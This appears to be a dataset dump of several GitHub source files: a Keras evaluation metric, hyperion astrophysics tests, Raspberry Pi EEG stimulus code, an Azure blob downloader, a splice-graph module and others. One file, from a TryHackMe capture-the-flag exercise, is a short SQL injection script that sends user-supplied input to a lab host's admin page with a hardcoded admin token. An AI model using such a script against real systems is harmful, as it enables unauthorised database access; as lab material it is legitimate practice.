seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
20049471962 | import numpy as np
from keras.applications.vgg16 import preprocess_input
def predict(img_dir):
img = load_img(img_dir)
img = np.resize(img, (224,224,3))
img = preprocess_input(img_to_array(img))
img = (img/255.0)
img = np.expand_dims(img, axis=0)
prediction = model.predict(img)
idx = np.argmax(prediction)
return idx
pred = test_label_df.at[idx,'keras_index']
def second_metric(test_df):
x = 0
P = 0
users = test_df['user'].value_counts()
for index, row in users.items():
N = 0
su_df = test[test['user']==index]
labels_idx = su_df['label'].value_counts()
for index2, row2 in labels_idx.items():
r = 0
s_obs = su_df[su_df['label']==index2]
for index3, row3 in s_obs.iterrows():
img_dir = row3['id']
pred = test_label_df.at[idx,'keras_index']
if pred==row3['label']:
r += 1/row3['rank']
temp_N = row3['label']
if r == 0:continue
N += r/len(s_obs.index)
P += (N/su_df['label'].nunique())
print(str(P)+ ' P')
print(su_df['label'].nunique())
U = test['user'].nunique()
return P/U
def first_metric(test_df):
P = 0
users = test_df['user'].value_counts()
for index, row in users.items():
r = 0
temp = test_df[test['user']==index]
for index2, row2 in temp.iterrows():
img_dir = row2['id']
img = load_img(img_dir)
img = np.resize(img, (224,224,3))
img = preprocess_input(img_to_array(img))
img = (img/255.0)
img = np.expand_dims(img, axis=0)
prediction = model.predict(img)
idx = np.argmax(prediction)
pred = test_label_df.at[idx,'keras_index']
print(pred==row2['label'])
if pred==row2['label']:
r += 1/row2['rank']
if r == 0:continue
sum_r = 1/r
temp_P = (sum_r/temp['label'].nunique())
P += temp_P
U = test_df['user'].nunique()
return P/U
| ocinemod87/Advanced_Topics_Image_Analysis | Assignment_3/custom_metric.py | custom_metric.py | py | 1,949 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.resize",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "keras.applications.vgg16.preprocess_input",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.expand_dims",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": ... |
5991316924 | import requests
import re
import sys
inject = sys.argv[1]
url = f"http://10.10.33.143/admin?user={inject}"
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2ODE0MDYxNjZ9.7S5bGRpPZetpWvlwYOa3U2D24wYQGDcm7R_CaLONA5E"
headers = {
"Cookie": f"token={token}"
}
r = requests.get(url, headers=headers)
result = re.findall(r'<body>(.*)</body>', r.text, re.S)
print(result[0])
# print(r.text)
| singha-brother/ctf_challenges | TryHackMe/marketplace/sql_exploit.py | sql_exploit.py | py | 461 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "re.S",
"line_number": 16,
... |
37412475145 | import pytest
import numpy as np
from ...dust import IsotropicDust
from ...util.functions import B_nu
from .. import Model
from .test_helpers import random_id, get_test_dust
def test_point_source_outside_grid(tmpdir):
dust = get_test_dust()
m = Model()
m.set_cartesian_grid([-1., 1.], [-1., 1.], [-1., 1.])
m.add_density_grid(np.array([[[1.]]]), dust)
m.set_n_photons(initial=100, imaging=0)
s = m.add_point_source()
s.position = (-1.5, 0., 0.)
s.temperature = 5000.
s.luminosity = 1.
m.write(tmpdir.join(random_id()).strpath)
log_file = tmpdir.join(random_id()).strpath
with pytest.raises(SystemExit) as exc:
m.run(tmpdir.join(random_id()).strpath, logfile=log_file)
assert exc.value.args[0] == 'An error occurred, and the run did not ' + \
'complete'
assert 'photon was not emitted inside a cell' in open(log_file).read()
def test_unsorted_spectrum(tmpdir):
m = Model()
m.set_cartesian_grid([-1., 1.], [-1., 1.], [-1., 1.])
m.set_n_photons(initial=100, imaging=0)
s = m.add_point_source()
s._spectrum = {'nu': [3.e20, 2.e10, 1], 'fnu': [1, 2, 3]}
s.luminosity = 1.
m.write(tmpdir.join(random_id()).strpath)
log_file = tmpdir.join(random_id()).strpath
with pytest.raises(SystemExit) as exc:
m.run(tmpdir.join(random_id()).strpath, logfile=log_file)
assert exc.value.args[0] == 'An error occurred, and the run did not ' + \
'complete'
assert 'spectrum frequency should be monotonically increasing' in open(log_file).read()
def test_spectrum_dust_nooverlap(tmpdir):
# Set up dust with a narrow frequency range
nu = np.logspace(8., 10., 100)
albedo = np.repeat(0.5, 100)
chi = np.ones(100)
d = IsotropicDust(nu, albedo, chi)
d.set_lte_emissivities(10, 0.1, 1000.)
# Set up model with a source with a wider frequency range
m = Model()
s = m.add_point_source()
s.luminosity = 1.
nu = np.logspace(5., 12., 1000)
s.spectrum = (nu, B_nu(nu, 6000.))
m.set_cartesian_grid([-1., 1.], [-1., 1.], [-1., 1])
m.add_density_grid(np.array([[[1.]]]), d)
m.set_n_photons(initial=1000, imaging=0)
m.write(tmpdir.join(random_id()).strpath)
log_file = tmpdir.join(random_id()).strpath
with pytest.raises(SystemExit) as exc:
m.run(tmpdir.join(random_id()).strpath, logfile=log_file)
assert exc.value.args[0] == 'An error occurred, and the run did not ' + \
'complete'
assert 'photon frequency' in open(log_file).read()
assert 'is outside the range defined' in open(log_file).read()
assert 'for the dust optical properties' in open(log_file).read()
| hyperion-rt/hyperion | hyperion/model/tests/test_fortran.py | test_fortran.py | py | 2,753 | python | en | code | 51 | github-code | 36 | [
{
"api_name": "test_helpers.get_test_dust",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "test_helpers.random_id",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "test_he... |
40272165655 | import abc
import threading
import time
from datetime import datetime
from .AbstractProcess import AbstractProcess
from .SaveStopProcess import SaveStopProcess
from utils.threads import set_thread_name
class SaveStartProcess(AbstractProcess):
@staticmethod
def __parse_buffer(buffer):
try:
coordinates, collect_time = buffer.split('/')
coordinates = tuple(int(i) for i in coordinates.split(','))
collect_time = int(collect_time)
return coordinates, collect_time
except ValueError:
coordinates = tuple(int(i) for i in buffer.split(','))
return coordinates, None
@staticmethod
def __msg_to_send(coordinates):
msg = ""
try:
from_x, from_y, to_x, to_y = coordinates
msg += "'from' coordinate: (%d, %d)\n" % (from_x, from_y)
msg += "'to' coordinate: (%d, %d)" % (to_x, to_y)
except ValueError:
x, y = coordinates
msg += "Saving start-coordinate: (%d, %d)\n" % (x, y)
finally:
return msg
@abc.abstractmethod
def execute(self):
set_thread_name("SAVE_START")
print('\n>>>save_start_process', threading.current_thread())
self.shutdown_and_wait()
self.is_save = True
buffer = self.request.recv(100).decode().strip()
coordinate, collect_time = self.__parse_buffer(buffer)
self.collection_details.coordinate = coordinate
self.collection_details.save_start_time = datetime.now()
threading.Thread(target=self.reopen_server,
args=('save_start_process',), daemon=True).start()
msg = self.__msg_to_send(coordinate)
self.send_msg_to_client(msg)
if collect_time:
set_thread_name("REOPEN")
time.sleep(collect_time)
SaveStopProcess(self.server, self.request).execute()
| donghyyun/PF_OfflinePhaseServer | handle_processes/SaveStartProcess.py | SaveStartProcess.py | py | 1,933 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "AbstractProcess.AbstractProcess",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "utils.threads.set_thread_name",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "threading.current_thread",
"line_number": 40,
"usage_type": "call"
},
{... |
36939059453 | import plotly.express as px
import plotly.graph_objects as go
import pandas as pd
def create_number_tweets_graphic(
data: pd.DataFrame, colors: list[str], time_stamps: list[tuple[int, int]]
) -> go.Figure:
"""Returns a picture with a histogram per newspaper
Args:
data (pd.DataFrame): Data frame with a "created_at" column
colors (list[str]): List of colors for the graph
time_stamps (list[tuple[int, int]]): List with the timestamps
Returns:
go.Figure: Histogram figure
"""
fig = px.histogram(
data,
x="created_at",
color_discrete_sequence=colors,
facet_row="newspaper",
title=f"<b>Number of tweets per newspaper</b><br>From W{time_stamps[0][1]} of {time_stamps[0][0]} to W{time_stamps[-1][1]} of {time_stamps[-1][0]}",
height=1600,
)
fig.update_traces(xbins_size="D1")
fig.update_layout(title={"x": 0.02, "y": 0.97})
fig.for_each_annotation(lambda a: a.update(text=f"@{a.text.split('=')[-1]}"))
return fig
| drearondov/nlp-newspapersDashboard | nlp_newspapersDashboard/api/number_tweets.py | number_tweets.py | py | 1,038 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "plotly.express.histogram",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "plotly.g... |
22636872735 | import os
os.system('sudo pigpiod')
import time
from random import randint
from random import shuffle
import pigpio
import RPi.GPIO as GPIO
from datetime import datetime
import numpy as np
import pandas as pd
import pygame
###variables for filenames and save locations###
partnum = '001'
device = 'Amp'
filename = 'Shutter_Image'
exp_loc = 'Shutter_Image'
date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
###setup GPIO pins and initialise pygame###
pi = pigpio.pi()
GPIO.setmode(GPIO.BCM)
pygame.init()
pygame.display.init()
###setup pins for triggers###
GPIO.setup([4,17,27,22,5,6,13,19],GPIO.OUT)
###setup pins for each LCD###
lcd_freq = 17
dc = 50 * 10000
###setup pin for push button###
pin = 26
GPIO.setup(pin,GPIO.IN,pull_up_down=GPIO.PUD_UP)
###setup variables to record times###
trial_dc = []
trial_face = []
resp_time = []
resp_type = []
face_num = []
###audio file location###
tone = '/home/pi/Pi_Experiments/Stimuli/Sounds/Auditory_Oddball/low_tone.wav'
###setup the display screen and fixation###
pygame.mouse.set_visible(0)
disp_info = pygame.display.Info()
x_width = disp_info.current_w
y_height = disp_info.current_h
x_center = disp_info.current_w/2
y_center = disp_info.current_h/2
screen = pygame.display.set_mode((x_width, y_height),pygame.FULLSCREEN)
####FOR TESTING ONLY####
##x_width = 400
##y_height = 300
##x_center = x_width/2
##y_center = y_height/2
##screen = pygame.display.set_mode((x_width, y_height),pygame.RESIZABLE)
########################
black = pygame.Color(0, 0, 0)
white = pygame.Color(255,255,255)
grey = pygame.Color(127,127,127)
rect_x = 5
rect_y = 5
screen.fill(white)
###settings to change###
font_colour = black
fixation_colour_outer= black
fixation_length_outer = 4
fixation_size_outer = 3
fixation_colour_inner = white
fixation_length_inner = 3
fixation_size_inner = 1
###create our grid###
grid_size = 9 ###total squares will be this number squared, max is 9 due to current trigger system (i_square * 3 = onset; i_square * 3 + 1 = offset)
fig_style = 3 ###1 = horizontal; 2 = vertical; 3 = repeat gradient
colour_order = [255,0] ###1 = black to white; 2 = white to black
fixation_time = 0 ###number of seconds to focus on each square
pre_time = 0.5
post_time = 0.5
#########################
###determine x and y coordinates for each square###
x_locs = list(np.linspace(0,x_width,(grid_size)+1))
y_locs = list(np.linspace(0,y_height,(grid_size)+1))
###setup our colours (black, greys, white)
grid_colour = []
colour_list = np.linspace(colour_order[0],colour_order[1],(grid_size))
for i_square in range((grid_size)):
temp = np.zeros(3) + colour_list[i_square]
grid_colour.append(temp.tolist())
###draw grid###
for i_y in range(len(y_locs)-1):
if fig_style == 1: ###horizontal bars
for i_x in range(len(x_locs)-1):
pygame.draw.rect(screen, grid_colour[i_y], (x_locs[i_x], y_locs[i_y], x_locs[i_x+1], y_locs[i_y+1]),0)
elif fig_style == 2: ###vertical bars
for i_x in range(len(x_locs)-1):
pygame.draw.rect(screen, grid_colour[i_x], (x_locs[i_x], y_locs[i_y], x_locs[i_x+1], y_locs[i_y+1]),0)
elif fig_style == 3: ###repeat gradient
for i_x in range(len(x_locs)-1):
pygame.draw.rect(screen, grid_colour[i_x], (x_locs[i_x], y_locs[i_y], x_locs[i_x+1], y_locs[i_y+1]),0)
grid_colour.append(grid_colour.pop(0))
###Setup our function to send triggers###
def pi2trig(trig_num):
pi_pins = [4,17,27,22,5,6,13,19]
bin_num = list(reversed(bin(trig_num)[2:]))
while len(bin_num) < len(pi_pins):
bin_num.insert(len(bin_num)+1,str(0))
trig_pins = []
trig_pos = 0
for i_trig in range(len(pi_pins)):
if bin_num[i_trig] == '1':
trig_pins.insert(trig_pos,pi_pins[i_trig])
trig_pos = trig_pos + 1
return trig_pins
###set triggers to 0###
GPIO.output(pi2trig(255),0)
###wait for response###
pygame.display.flip()
time.sleep(0.1)
key_pressed = 0
pygame.event.clear()
while key_pressed == 0:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
key_pressed = 1
time.sleep(0.5)
pi.hardware_PWM(18, lcd_freq, dc)
###draw a fixation over the square to focus on###
if fig_style == 1:###horizontal lines
###collapse across x locations###
x_locs = [0,x_locs[-1]]
elif fig_style == 2: ###vertical lines
###collapse across y locations###
y_locs = [0,y_locs[-1]]
i_square = 0
for i_y in range(len(y_locs)-1):
for i_x in range(len(x_locs)-1):
###update current square###
i_square += 1
###determine center of current square###
x_center = int(x_locs[i_x] + ((x_locs[i_x+1] - x_locs[i_x])/2))
y_center = int(y_locs[i_y] + ((y_locs[i_y+1] - y_locs[i_y])/2))
###get colour of current square###
crnt_colour = screen.get_at((x_center, y_center))[:3]
###draw fixation###
pygame.draw.line(screen, fixation_colour_outer, (x_center-fixation_length_outer, y_center), (x_center+fixation_length_outer, y_center),fixation_size_outer)
pygame.draw.line(screen, fixation_colour_outer, (x_center, y_center-fixation_length_outer), (x_center, y_center+fixation_length_outer),fixation_size_outer)
pygame.draw.line(screen, fixation_colour_inner, (x_center-fixation_length_inner, y_center), (x_center+fixation_length_inner, y_center),fixation_size_inner)
pygame.draw.line(screen, fixation_colour_inner, (x_center, y_center-fixation_length_inner), (x_center, y_center+fixation_length_inner),fixation_size_inner)
GPIO.output(pi2trig(((i_square)*3)),1)
pygame.display.flip()
###wait for a bit###
time.sleep(pre_time)
GPIO.output(pi2trig(255),0)
time.sleep(fixation_time)
GPIO.output(pi2trig(((i_square)*3)+1),1)
time.sleep(post_time)
GPIO.output(pi2trig(255),0)
###remove fixation###
pygame.draw.line(screen, crnt_colour, (x_center-fixation_length_outer, y_center), (x_center+fixation_length_outer, y_center),fixation_size_outer)
pygame.draw.line(screen, crnt_colour, (x_center, y_center-fixation_length_outer), (x_center, y_center+fixation_length_outer),fixation_size_outer)
pi.hardware_PWM(18, lcd_freq, 0)
os.system('sudo killall pigpiod')
pygame.display.quit()
pygame.quit()
GPIO.cleanup()
| APPLabUofA/Pi_Experiments | Shutter_Grid/Task/shutter_grid.py | shutter_grid.py | py | 6,498 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "os.system",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "pigpio.pi",
"lin... |
1435191130 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import shutil
import azure
from azure.storage import BlobService
import azure.http
import os.path
import sys
import os
import pdb
storage_name = ""
storage_key = ""
def list_files_from_path(container, path):
blob_service = BlobService(account_name=storage_name, account_key=storage_key)
next_marker = None
results = []
while True:
blobs = blob_service.list_blobs(container, prefix=path, maxresults=2000, marker=next_marker)
for blob in blobs:
results.append(blob.name)
next_marker = blobs.next_marker
if not next_marker:
break
return results
def download_file(container, path, dest):
blob_service = BlobService(account_name=storage_name, account_key=storage_key)
loop = 0
while True:
try:
blob_service.get_blob_to_path(container, path, dest)
break
except azure.http.HTTPError as e:
loop = loop + 1
if loop >= 3:
return
if __name__ == '__main__':
storage_name = input(">>storage_name:")
storage_key = input(">>storage_key:")
container = input(">>container:")
path = input(">>path")
#container="azurefilesystem2"
#path="Ver0v1/2015-03-26"
print(storage_name)
print(storage_key)
print(container)
print(path)
if not os.path.exists(container):
os.makedirs(container)
files = list_files_from_path(container, path)
print("total files count is {0}".format(len(files)))
for f in files:
f_name = os.path.basename(f)
dest = os.path.join(container, f_name)
print("download from {0}:{1} to {2}".format(container, f, dest))
download_file(container, f, dest)
| UnluckyNinja/hwindCode | python/scripts/download_files_from_azure.py | download_files_from_azure.py | py | 1,763 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "azure.storage.BlobService",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "azure.storage.BlobService",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "azure.http",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "o... |
22112532649 | import networkx as nx
import itertools as it
import argparse
import algorithms as algs
import gtf
from utils import get_chr, get_start_pos, get_end_pos, get_pos, merge_list_of_dicts
import utils
import sys
from wig import Wig
from exon_seek import ExonSeek
import multinomial_em as mem
import copy
# logging imports
import logging
class SpliceGraph(object):
'''
The SpliceGraph class is meant to provide a common repository for creation
of splice graphs for a single gene.
'''
def __init__(self, annotation, chr, strand, read_threshold=5, filter_factor=50, min_count=1):
self.chr = chr
self.strand = strand
self.READ_THRESHOLD = read_threshold
self.MIN_COUNT = min_count
self.FILTER_FACTOR = filter_factor
self.annotation = [] # set value using set_graph_as_annotation
if annotation is not None:
self.set_graph_as_annotation(annotation)
else:
self.graph = None
def get_graph(self):
"""getter for self.graph"""
return self.graph
def set_graph_as_annotation(self, annotation):
"""
Create a nx DiGraph from list of tx in gene. FILTER_FACTOR defines a
cutoff for using a tx of a gene. A tx must have x num of exon where x
> MAX tx exon num / FILTER_FACTOR.
"""
# filter low exon tx
max_exons = max(map(len, annotation)) # figure out max num exons
self.annotation = map(lambda y: sorted(y, key=lambda z: (z[0], z[1])), # make sure exons are sorted by position
filter(lambda x: len(x) > max_exons / self.FILTER_FACTOR, annotation)) # filter based on max num exons criteria
# create graph
graph = nx.DiGraph()
for tx in self.annotation:
graph.add_path(tx)
self.graph = graph # set graph attribute
def set_annotation_edge_weights(self, weights):
"""
Only try to find weights for already existing edges in the graph. This
function is intended to add weight values to edges defined in the gtf
annotation.
"""
# add edge weights to edges from annotation
for u, v in self.graph.edges():
try:
#tmpChr = get_chr(exon_forms[u])
start = u[1] # get_start_pos(exon_forms[u])
end = v[0] # get_end_pos(exon_forms[v])
#tmpWeight = weights[self.chr][start][end]
tmpWeight = weights[(self.chr, start, end)]
self.graph[u][v]['weight'] = tmpWeight
except KeyError:
self.graph[u][v]['weight'] = 1 # set dummy value
self.graph[u][v]['weight'] = max(self.graph[u][v]['weight'], self.MIN_COUNT) # set read count to at least a user-defined value
def set_graph_as_nodes_only(self, exons):
"""
Simple function that makes a DAG (nx.DiGraph) with only nodes and no
edges. Meant to be used to before add_all_possible_edge_weights.
"""
G = nx.DiGraph()
G.add_nodes_from(exons)
self.graph = G
def add_all_possible_edge_weights(self, weights): # use to have exon_forms rather than chr
"""
Add edge/weights to graph if supported by atleast READ_THRESHOLD
number of reads
"""
# add novel edges if well supported
sorted_nodes = sorted(self.graph.nodes())
for i in range(len(sorted_nodes) - 1):
for j in range(i + 1, len(sorted_nodes)):
try:
start = sorted_nodes[i][1] # get_start_pos(exon_forms[sorted_nodes[i]])
end = sorted_nodes[j][0] # get_end_pos(exon_forms[sorted_nodes[j]])
if weights[(self.chr, start, end)] >= self.READ_THRESHOLD:
self.graph.add_edge(sorted_nodes[i], sorted_nodes[j])
self.graph[sorted_nodes[i]][sorted_nodes[
j]]['weight'] = weights[(self.chr, start, end)]
except KeyError:
pass
def get_from_gtf_using_gene_name(gtf, strand, chr, start, end):
'''
This function finds the first gene in the gtf that completely contains the
target interval. I should really think about checking for multiple genes
instead of just returning the first one found.
'''
for gene_key in gtf[chr]:
if gtf[chr][gene_key]['strand'] == strand and gtf[chr][gene_key]['start'] <= start and gtf[chr][gene_key]['end'] >= end:
for ex in gtf[chr][gene_key]['exons']:
# if start >= ex[0] and end <= ex[1]:
if start == ex[0] and end == ex[1]:
gtf[chr][gene_key]['target'] = ex # this line needed for compatability reasons
return gtf[chr][gene_key], gene_key
raise utils.PrimerSeqError("Error: Did not find an appropriate gtf annotation")
def get_weakly_connected_tx(gtf, strand, chr, start, end, plus_or_minus=1000000):
'''
This function is meant to handle tx annotations without gene ids.
Currently this is a function outside of the SpliceGraph class but it may
be beneficial to later include this as a method.
'''
# compile all tx paths that are reasonably close
tmp_tx = []
for gene_key in gtf[chr]:
if gtf[chr][gene_key]['strand'] == strand and gtf[chr][gene_key]['start'] <= (start + plus_or_minus) and gtf[chr][gene_key]['end'] >= (end - plus_or_minus):
tmp_tx += gtf[chr][gene_key]['graph']
# get the weakly connected subgraph that contains the target exon
sg = SpliceGraph(tmp_tx, chr, strand, filter_factor=1000)
G = sg.get_graph()
weakly_con_subgraphs = nx.weakly_connected_component_subgraphs(G)
if not (len(weakly_con_subgraphs) > 0): raise utils.PrimerSeqError('Error: No annotations were even near your target')
target_graph = None
for weak_subgraph in weakly_con_subgraphs:
for node_start, node_end in weak_subgraph.nodes():
# if node_start <= start and node_end >= end:
if node_start == start and node_end == end:
target_graph = weak_subgraph
start, end = node_start, node_end
if target_graph is None: raise utils.PrimerSeqError('Error: Target was not contained in a tx')
# filter tmp_tx to tx that contain atleast one node in subgraph
filtered_tmp_tx = []
for tx in tmp_tx:
for exon in tx:
if exon in target_graph.nodes():
filtered_tmp_tx.append(tx)
break
if not (len(filtered_tmp_tx) > 0): utils.PrimerSeqError('Error: Your target was not contained in a tx.')
### convert info to dict ###
g_dict = {}
# get a unique set of all exons
exons = set()
for t in filtered_tmp_tx:
exons |= set(t)
g_dict['exons'] = sorted(exons, key=lambda x: (x[0], x[1]))
g_dict['start'] = g_dict['exons'][0][0]
g_dict['end'] = g_dict['exons'][-1][1]
g_dict['chr'] = chr
g_dict['graph'] = filtered_tmp_tx
g_dict['target'] = (start, end)
return g_dict, 'Invalid'
def get_flanking_biconnected_exons(name, target, sGraph, genome):
'''
Defines flanking exons as exons that cannot be skipped in
the graph structure. Theese exons are 100% included and do not
need estimation of inclusion level.
'''
graph = sGraph.get_graph() # nx.DiGraph
# search through each biconnected component
for component in algs.get_biconnected(graph):
component = sorted(component, key=lambda x: (x[0], x[1])) # ensure first component is first exon, etc
if target in component[1:-1]:
# define upstream/downstream flanking exon
if sGraph.strand == '+':
upstream = component[0]
downstream = component[-1]
else:
upstream = component[-1]
downstream = component[0]
# get possible lengths
all_paths = algs.AllPaths(sGraph, component, target,
chr=sGraph.chr, strand=sGraph.strand)
# all_paths.set_all_path_lengths() # should no longer need this since it is done in primer.py
all_paths.set_all_path_coordinates()
# get sequence of upstream/target/downstream combo
genome_chr = genome[sGraph.chr] # chr object from pygr
upstream_seq, target_seq, downstream_seq = genome_chr[upstream[0]:upstream[1]], genome_chr[target[0]:target[1]], genome_chr[downstream[0]:downstream[1]]
if sGraph.strand == '-':
upstream_seq, target_seq, downstream_seq = \
-upstream_seq, -target_seq, -downstream_seq
return [sGraph.strand, name[1:], 'NA',
sGraph.chr + ':' + '-'.join(map(str, upstream)), '1.0',
sGraph.chr + ':' + '-'.join(map(str, downstream)), '1.0',
all_paths, str(upstream_seq).upper(),
str(target_seq).upper(), str(downstream_seq).upper()]
return ['Error: ' + name + ' was not found in a biconnected component']
def get_sufficient_psi_exons(name, target, sGraph, genome, ID, cutoff, upstream_exon, downstream_exon):
"""
Utilizes the ExonSeek class to find flanking exons that are
good enough to be called "constitutive".
"""
# find appropriate flanking "constitutive" exon for primers
exon_seek_obj = ExonSeek(target, sGraph, ID, cutoff, upstream_exon, downstream_exon)
all_paths, upstream, downstream, component, psi_target, psi_upstream, psi_downstream = exon_seek_obj.get_info()
# lack of successor/predecessor nodes
if upstream is None or downstream is None:
logging.debug("Error: %s does not have an upstream exon, downstream exon, or possibly both" % str(component))
return ["Error: %s does not have an upstream exon, downstream exon, or possibly both" % str(component)]
# get sequence of upstream/target/downstream combo
genome_chr = genome[sGraph.chr] # chr object from pygr
upstream_seq, target_seq, downstream_seq = genome_chr[upstream[0]:upstream[1]], genome_chr[target[0]:target[1]], genome_chr[downstream[0]:downstream[1]] # get sequence using pygr
if sGraph.strand == '-':
upstream_seq, target_seq, downstream_seq = -upstream_seq, -target_seq, -downstream_seq # get reverse-complement if necessary
return [sGraph.strand, name[1:], psi_target,
sGraph.chr + ':' + '-'.join(map(str, upstream)), # upstream eg. +chr1:1000-2000
psi_upstream,
sGraph.chr + ':' + '-'.join(map(str, downstream)), # downstream eg. +chr1:1000-2000
psi_downstream,
all_paths, upstream_seq,
target_seq, downstream_seq]
def predefined_exons_case(id, target, sGraph, genome, upstream_exon, downstream_exon):
"""
Strategy:
1. Use All Paths (then trim)
2. Save counts/paths to file
3. get sequence information
"""
# get possible exons for primer amplification
tmp_exons = copy.deepcopy(sGraph.get_graph().nodes())
tmp = sorted(tmp_exons, key=lambda x: (x[0], x[1]))
if sGraph.strand == '+':
my_exons = tmp[tmp.index(upstream_exon):tmp.index(downstream_exon) + 1]
else:
my_exons = tmp[tmp.index(downstream_exon):tmp.index(upstream_exon) + 1]
# Use correct tx's and estimate counts/psi
all_paths = algs.AllPaths(sGraph, my_exons, target, chr=sGraph.chr, strand=sGraph.strand)
# all_paths.trim_tx_paths()
#all_paths.trim_tx_paths_using_flanking_exons(sGraph.strand, upstream_exon, downstream_exon)
all_paths.trim_tx_paths_using_flanking_exons_and_target(sGraph.strand, target, upstream_exon, downstream_exon)
all_paths.set_all_path_coordinates()
# all_paths.keep_weakly_connected() # hack to prevent extraneous exons causing problems in EM alg
paths, counts = all_paths.estimate_counts() # run EM algorithm
# psi_target = algs.estimate_psi(target, paths, counts)
psi_target = mem.estimate_psi(target, paths, counts)
utils.save_path_info(id, paths, counts) # save paths/counts in tmp/isoforms/id.json
# get sequence of upstream/target/downstream combo
genome_chr = genome[sGraph.chr] # chr object from pygr
upstream_seq, target_seq, downstream_seq = genome_chr[upstream_exon[0]:upstream_exon[1]], genome_chr[target[0]:target[1]], genome_chr[downstream_exon[0]:downstream_exon[1]] # get sequence using pygr
if sGraph.strand == '-':
upstream_seq, target_seq, downstream_seq = -upstream_seq, -target_seq, -downstream_seq # get reverse-complement if necessary
return [sGraph.strand, '%s:%d-%d' % (sGraph.chr, target[0], target[1]), psi_target,
sGraph.chr + ':' + '-'.join(map(str, upstream_exon)), # upstream eg. +chr1:1000-2000
-1, # user defined exon, don't estimate psi
sGraph.chr + ':' + '-'.join(map(str, downstream_exon)), # downstream eg. +chr1:1000-2000
-1, # user defined exon, don't estimate psi
all_paths, upstream_seq,
target_seq, downstream_seq]
def calculate_target_psi(target,
sg_list,
component,
up_exon=None,
down_exon=None):
"""
Calculate psi for the target exon for each bam file. Sometimes there are
no inc and no skip counts so there will be a divide by zero error. In such
cases PSI takes the value of -1.
"""
logging.debug("Calculating psi for each bam file . . .")
psi_list = []
for sg in sg_list:
# setup allpaths object
ap = algs.AllPaths(sg, component, target, chr=sg.chr)
# trim paths according to if user specified flanking exons
if up_exon and down_exon:
ap.trim_tx_paths_using_flanking_exons(sg.strand, up_exon, down_exon)
else:
ap.trim_tx_paths()
# ap.keep_weakly_connected() # hack to avoid problems with user specified flanking exons
# estimate psi
paths, counts = ap.estimate_counts()
tmp_inc_count, tmp_skip_count = 0., 0.
for i, p in enumerate(paths):
if target in p:
tmp_inc_count += counts[i] / (len(p) - 1) # need to normaliz inc counts by number of jcts
else:
tmp_skip_count += counts[i] / (len(p) - 1) # need to normalize skip counts by number of jcts
if not tmp_inc_count and not tmp_skip_count:
tmp_psi = -1 # -1 indicates divide by zero error
else:
tmp_psi = tmp_inc_count / (tmp_inc_count + tmp_skip_count)
psi_list.append(tmp_psi)
logging.debug("Finished calculating psi for each bam file.")
return ';'.join(map(lambda x: '%.4f' % x, psi_list)) # only report to four decimal places
def construct_splice_graph(edge_weights_list, gene_dict, chr, strand, read_threshold, min_count,
output_type='single', both=False):
"""
Handles construction of SpliceGraph objects
"""
if output_type == 'single':
# case where counts are pooled from all BAM files
splice_graph = SpliceGraph(annotation=gene_dict['graph'], # use junctions from annotation
chr=chr,
strand=strand,
read_threshold=read_threshold,
min_count=min_count)
edge_weights = merge_list_of_dicts(edge_weights_list) # merge all SAM/BAM read counts to a single dictionary
splice_graph.set_annotation_edge_weights(edge_weights) # set edge weights supported from annotation
if both: splice_graph.add_all_possible_edge_weights(edge_weights) # also use junctions from RNA-Seq
return splice_graph
elif output_type == 'list':
# returns a list of splice graphs (one for each BAM file)
single_bam_splice_graphs = []
for eweight in edge_weights_list:
tmp_sg = SpliceGraph(annotation=gene_dict['graph'],
chr=chr,
strand=strand,
read_threshold=read_threshold,
min_count=min_count)
tmp_sg.set_annotation_edge_weights(eweight)
if both: tmp_sg.add_all_possible_edge_weights(eweight)
single_bam_splice_graphs.append(tmp_sg)
return single_bam_splice_graphs
def main(options, args_output='tmp/debug.json'):
"""
The gtf main function is the function designed to be called from other
scripts. It iterates through each target exons and returns the necessary
information for primer design.
"""
genome, args_gtf, args_target = options['fasta'], options['gtf'], options['target']
# the sam object interfaces with the user specified BAM/SAM file!!!
sam_obj_list = options['rnaseq']
# iterate through each target exon
output = [] # output from program
for line in args_target: # was line in handle
name, line = line # bad style of reassignment
tgt = line[0]
strand = tgt[0]
tmp_start, tmp_end = get_pos(tgt)
chr = get_chr(tgt[1:]) # [1:] since strand is first character
USER_DEFINED_FLANKING_EXONS = True if len(line) == 3 else False
if USER_DEFINED_FLANKING_EXONS:
up_exon = utils.get_pos(line[1]) # user's upstream exon
